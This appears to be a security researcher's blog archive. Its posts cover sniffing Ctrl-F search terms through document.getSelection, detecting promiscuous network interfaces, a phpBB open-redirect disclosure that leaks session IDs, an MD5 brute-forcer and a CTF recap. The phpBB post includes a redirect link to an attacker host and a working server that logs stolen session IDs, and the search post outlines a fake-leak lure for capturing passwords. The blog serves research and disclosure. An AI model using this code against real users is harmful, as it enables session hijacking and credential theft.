I know what you’re searching for…
Didn’t you always want to know what your visitors are searching for? And I don’t mean what they typed into Google, but what term(s) they try to find on your website (e.g. using Ctrl-F).
The idea is pretty straightforward: if you search for something on a site, your browser highlights what you are searching for (at least the first hit), so it has to fiddle with the representation of the page somehow. The shadow DOM presents itself as a likely target for this. For those who have never heard of it, I recommend Glazkov (2011); in short, it is a way to create and modify elements hidden in the DOM, frequently used by browsers to draw complex items like media player controls. While reading up to find out what the API might be, I stumbled upon document.getSelection(). I didn’t really think this would work, but in fact it does. Well, at least in Firefox. In Chrome the user has to close the search widget before the searched term becomes available, and in Opera it doesn’t work at all. So what do I mean by “it works”?
Firefox highlights the search result on the page and treats it as a selection. This enables the site to have a look at what you are typing into your search field. But it comes with one drawback: the getSelection method only works if the searched term can actually be found within the document.
To solve this, a pretty straightforward approach sprang to mind: I could just generate dynamic content providing all possible next inputs. So I basically generate a base set of printable characters and wait for the user to start his search. Then, as he is typing, I continuously check what the user has typed and append a list of strings to the document, each consisting of the user’s term postfixed with one of the printable characters. As long as this happens faster than he is typing, and he types consecutively without changing letters within or at the beginning of the search term, it works. Such problems could be tackled by generating more letters in advance and also adding them within the words, but typical user behaviour should already be covered.
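To make the generation step concrete, here is a minimal sketch of the candidate-generation logic. It is in Python for brevity (the demo itself does this in JavaScript on the page), and the function name and the filtering of whitespace characters are my own choices, not taken from the demo.

import string

def next_candidates(prefix):
    # Offer "prefix + c" for every printable, non-whitespace character,
    # so whatever the user types next is already present in the document
    # and the browser's find-as-you-type keeps matching (and selecting) it.
    return [prefix + c for c in string.printable if c not in string.whitespace]

# Initially the page holds all single characters; once the selection
# reveals that the user has typed "pass", the page is rewritten to hold
# "passa", "passb", ..., and so on after every further keystroke.
print(next_candidates('pass')[:3])  # ['pass0', 'pass1', 'pass2']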
A very simple proof of concept can be found here.
You might wonder by now why this is interesting at all: we have stored all our data with social communities, and Google knows everything we search for anyhow. This brings me to how I initially got the idea to look into this. Once again I saw a tweet about a hacked site that I am registered at, and the leaked accounts were presented on some random Pastebin page. So I went there and did what? Of course, I searched for my email address, user name, or whatever information might indicate that my account information got leaked and is now accessible to everyone else.
In this scenario, all they can find out is that I am the owner of the account I searched for. No harm done, except for some privacy issues if combined with some more snooping. But what if an attacker generates user IDs on the fly based on what the lured user types, thereby gaining new information about the victim’s user name at site XY or his registered email address, depending on what information is presented to him in the fake leak?
This could be taken one step further: the site could present only numerical user IDs and corresponding passwords. As a targeted attack, this could reveal the user’s password, provided he is careless enough to type his password into his browser’s search field. But the inhibition threshold is probably much lower here, because you are typing into your own browser, not into the search function of some site or a search engine.
For those of you who really had a look at the demo, two questions probably arise.
The first question is probably: why are there 5 divs holding old selection predictions? That is caused by two factors. On the one hand, more than one div is needed, because once the found search term gets replaced via JavaScript, the selection becomes an empty string. On the other hand, fast typing causes fast replacement of the divs and makes them error-prone, especially when deleting. There are still some cases in which the script loses track, but the enhancements mentioned above should cure some of them.
The second remark would be that the generated text is not hidden very carefully. Well, at first I thought about leaving it as completely default text, making it easier to comprehend what is going on. But then again, I wanted to make it at least somewhat less obvious. Of course, with CSS, iframes, or whatever else you have up your sleeve, you can hide it completely from the potential victim.
By the way, this also works with Pentadactyl in Firefox and Vimium in Chromium when searching via “/”. This makes Chromium users who use Vimium more susceptible to such an attack.
PromiFinder
I recently started reading “Chained Exploits” and stumbled upon a quickly chipped-in reference to PromiScan. This tool does something pretty interesting that I had never heard of or read about before.
In short, it utilizes ARP requests with the faked broadcast MAC address ff:ff:ff:ff:ff:fe to discover network interfaces that are in promiscuous mode. This is possible because, as it turns out, the network interface hardware correctly filters out those requests, whereas if the interface is in promiscuous mode, the hardware forwards everything and the software (e.g. the kernel driver) evaluates only part of the MAC address before concluding that it is a broadcast address. I have read their paper, which I recommend to everyone interested in this topic, and thought: why not develop such a tool myself for Linux (as theirs is for Windows)?
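To illustrate the probe itself, here is a minimal sketch using scapy. It is my own reconstruction of the idea, not PromiScan’s code or the code of my tool below, and the target address 192.168.1.23 is just a placeholder.

from scapy.all import ARP, Ether, srp

def probe(ip, iface=None):
    # ff:ff:ff:ff:ff:fe is not a valid broadcast address, so a NIC in
    # normal mode silently drops the frame in hardware. A promiscuous NIC
    # hands it to the driver, whose sloppy broadcast check lets the ARP
    # request through, and the host answers.
    pkt = Ether(dst='ff:ff:ff:ff:ff:fe') / ARP(pdst=ip)
    answered, _ = srp(pkt, timeout=2, iface=iface, verbose=0)
    return len(answered) > 0  # a reply suggests the interface is sniffing

print(probe('192.168.1.23'))  # placeholder target IP; needs root to send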
Toying with this led me to a little drawback of the approach. On Linux, WLAN seems to be implemented by using the interface as if it were in promiscuous mode. As a result, all WLAN interfaces of Linux computers (I only tested with Ubuntu) show up as promiscuous interfaces.
So for everyone who wants to know what exactly I did, here is the source code. It currently checks all your network interfaces and scans all subnets for promiscuous devices. To use it you need the Python packages netifaces and scapy. To run the tool, simply execute the following command as root or sudo it.
scapy -c promiFinder.py
phpBB Vulnerability: Login redirect SessionID leakage
Yesterday I informed the phpBB developers of a flaw I found, but they dismissed the issue and told me that such vulnerabilities are unavoidable. Further, they told me that the session ID on its own does not provide access, because some other parameters get checked as well, like the User-Agent header and something they described as a “very similar IP”. I didn’t look into the implementation, so I don’t know exactly what they meant, but it sounds like an interesting approach.
But let’s not get too deep into the details before you know what this is all about. This is what I sent to the phpBB security tracker:
I. Problem Description
It is possible for an attacker to gain the SessionID from a victim. The attacker has to bring the victim to visit a link like http://www.phpBB-app.com/ucp.php?mode=login&redirect=http://mydoma.in/saveSID. This will reset the hidden redirect input field on the resulting page to “http://mydoma.in/saveSID”. If the victim now logs in, he will be redirected to this URL with the sid appended as a GET parameter, which looks like this on the attacker’s server:
—
GET /saveSID?sid=2d26f6b2f4fc7cf39d3d742e7ca4795e HTTP/1.1
Host: mydoma.in
[...]
—
II. Impact
The leaked SessionID can be used to continue other users’ sessions and thereby gain control over their accounts.
III. Solution
I would recommend not allowing redirects to foreign domains at all, as they do not seem to serve any purpose.
Let’s get back to their objections. The first check, against the User-Agent header, really does not provide any security at all, as the attacker only has to copy it from the request he received from the victim.
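To make this concrete, here is a minimal sketch of what the attacker’s saveSID endpoint could look like. The script and its log format are hypothetical (I never ran this against a real board), and it records the victim’s User-Agent precisely because that is what is needed to pass this first check.

from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class SaveSID(BaseHTTPRequestHandler):
    def do_GET(self):
        # The victim arrives here via phpBB's post-login redirect,
        # carrying the sid as a GET parameter.
        sid = parse_qs(urlparse(self.path).query).get('sid', [''])[0]
        ua = self.headers.get('User-Agent', '')
        print('sid=%s ip=%s ua=%s' % (sid, self.client_address[0], ua))
        # Bounce the victim somewhere inconspicuous, e.g. back to the board.
        self.send_response(302)
        self.send_header('Location', 'http://www.phpBB-app.com/')
        self.end_headers()

# Port 80 requires root; any port works if the redirect URL includes it.
HTTPServer(('', 80), SaveSID).serve_forever()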
The second is much trickier, as it is comparatively easy to forge an IP address but pretty hard to receive the response to such a request; well, at least to my knowledge. As far as I could see, they use nonces as a session-riding prevention, so you need the nonce to perform state-changing requests.
But nevertheless, I think one should try as hard as possible to keep the sid parameter from leaking outside the domain. Maybe someone else knows how to exploit this, or someday someone will find a way to do so.
MD5 Brute-Forcer
I just built a short MD5 brute-force script in Python and want to share it; maybe someone else out there finds it interesting. It is based upon john, more precisely its incremental mode, because john’s stdout flag does not work in the default mode, for whatever reason. If someone knows why, please tell me.
I wrote it because I had a lecture today in which the lecturer challenged us to reverse a given MD5 hash. The usual databases did not produce a hit, and neither did some dictionary-based attacks. So I decided to let john try it, but somehow I could not get it to recognize the hash as an MD5. Weirdly, md5sum calculated MD5s wrongly for me, so I decided to create a short Python script.
import os
import sys
import md5

if len(sys.argv) == 2:
    d = sys.argv[1]
    # Pipe john's incremental-mode candidates through md5 until one matches.
    o = os.popen('john -stdout -incremental')
    for l in o:
        if md5.new(l.strip()).hexdigest() == d:
            print l.strip()
else:
    print 'usage is: ' + sys.argv[0] + ' <md5 hash>'
P.S.: If someone knows why md5sum created wrong output, please enlighten me. The shell command looked like echo "word" | md5sum .
Update (April 23rd 2008):
Today I was told why the md5sum shell command did not work: echo terminates every output with a newline, so the hash is computed over the word plus a trailing newline. You have to use echo -n "word" | md5sum to suppress this behaviour.
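You can see the difference directly in Python, using the same (old Python 2) md5 module as in the script above:

import md5
print md5.new('word').hexdigest()    # the hash you actually want
print md5.new('word\n').hexdigest()  # what `echo "word" | md5sum` computes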
Update (May 6th 2008):
Yesterday I enhanced the script a little: it now takes the hashes from a file and is also capable of brute-forcing several hashes at the same time, which was the main reason for this enhancement. The hashes in the file can be separated by any kind of whitespace character recognized by split().
import os
import sys
import md5
import re

if len(sys.argv) == 2:
    f = open(sys.argv[1]).read().split()
    d = {}
    for h in f:
        # Keep only well-formed MD5 hashes (32 lowercase hex characters).
        if not re.search('^[0-9a-f]{32}$', h):
            print 'Invalid hash has been removed:', h
        else:
            d[h] = None
    o = os.popen('john -stdout -incremental')
    for l in o:
        for h in d:
            if md5.new(l.strip()).hexdigest() == h:
                d[h] = l.strip()
                print 'Hash:', h, 'Clear:', l.strip()
        # Stop as soon as every hash has been cracked.
        if all(d.values()):
            for h in d:
                print h, '= "' + d[h] + '"'
            sys.exit(0)
else:
    print 'usage is: ' + sys.argv[0] + ' <hash file>'
Bakkalaureatsarbeit
On Monday I finished my Bakkalaureatsarbeit. It is somewhat like a bachelor’s thesis. So I only have to take some more exams, which I need for my diploma anyway, and then I am allowed to put a BSc in front of my name \begin{proudness} · · · \end{proudness}.
It deals with the subject of making web application vulnerability scanners more effective. We started developing a web application scanner nearly a year ago as a university project, on which this thesis is based. Some pretty new approaches are built into the scanner that are, as far as I know, completely new among web application scanning software developed so far. I am working on this project with Daniel Kreischer, with whom I also wrote the Bakkalaureatsarbeit, and Martin Johns, who supervised the project and the paper and gave us many hints, ideas and inspirations.
The scanner itself is not yet ready for release, since it is still under heavy construction to implement all the described features and ideas, but a release is planned for the near future. We already tried to give a talk about this project in an earlier state at the 24C3 last year, but were rejected (in the last round at least, as we heard).
If you are interested in this topic or just curious, here is the link to the paper “Bakkalaureatsarbeit: Similarity Examinations of Webpages and Complexity Reduction in Web Application Scanners”. Well, it spans over 60 pages, so it is a little longer than a usual paper, but if you are already familiar with the web itself and with web application security, you can certainly skip the first part.
If you have ideas, concerns, or any kind of suggestion, please share them with us.
Implementation Vulnerabilities and Detection Paper
I totally forgot to put this one online. It is already half a year old and was the result of a seminar that took place in the winter term 2006/2007.
It discusses both web application vulnerabilities, like XSS, CSRF, SQL injection and the like, and classical ones, like buffer overflows, format strings and dangling pointer references. Each vulnerability is first explained, and afterwards we describe protection mechanisms and their possible problems.
There is only one major drawback: the paper is in German, so you may not be able to read it. But take this as your chance to learn the language. ;)
CIPHER 3 (aka Germany, country of hackers)
It has been a while since my last post, but I hope I can add some content again in the near future.
On Thursday, July 12th 2007, CIPHER 3 took place, and we, the CInsects, participated. For those of you who don’t know what this is, here is a little summary of what a CTF is. I had more or less voluntarily agreed to set up our infrastructure but, as life goes, had less time than I thought I would. So partly because of that, and partly because we always seem to start a little confused, we got off to a slow start and ranked among the last few places. But as the end drew closer, we slowly climbed towards the top. In the final spurt we wrote some obviously pretty good advisories, which brought us the lead in the advisory section and lifted us to 4th place in the end. We were really excited about this result, since nobody expected such a good placement after our muddled start.
The results and some statistics will be available next week on the CIPHER 3 homepage. Interestingly, the first six teams are all from Germany, so Germany seems to be becoming the country of hackers … erm … I mean security experts ;). Well, possibly this is only because the contest is organized and held by a German team. Here is the final scoreboard. If you are interested in which team is from where and whom it represents, just compare the numbers with those on the CIPHER 3 homepage.
I want to thank Lexi and his crew again for making such a cool event possible, taking all the time needed to prepare it, and keeping calm when players complain because something doesn’t work as intended. Naturally, I also want to thank all the other participants. It was a great game and I hope everyone enjoyed it as much as we did. :)
Update: Stats are available here.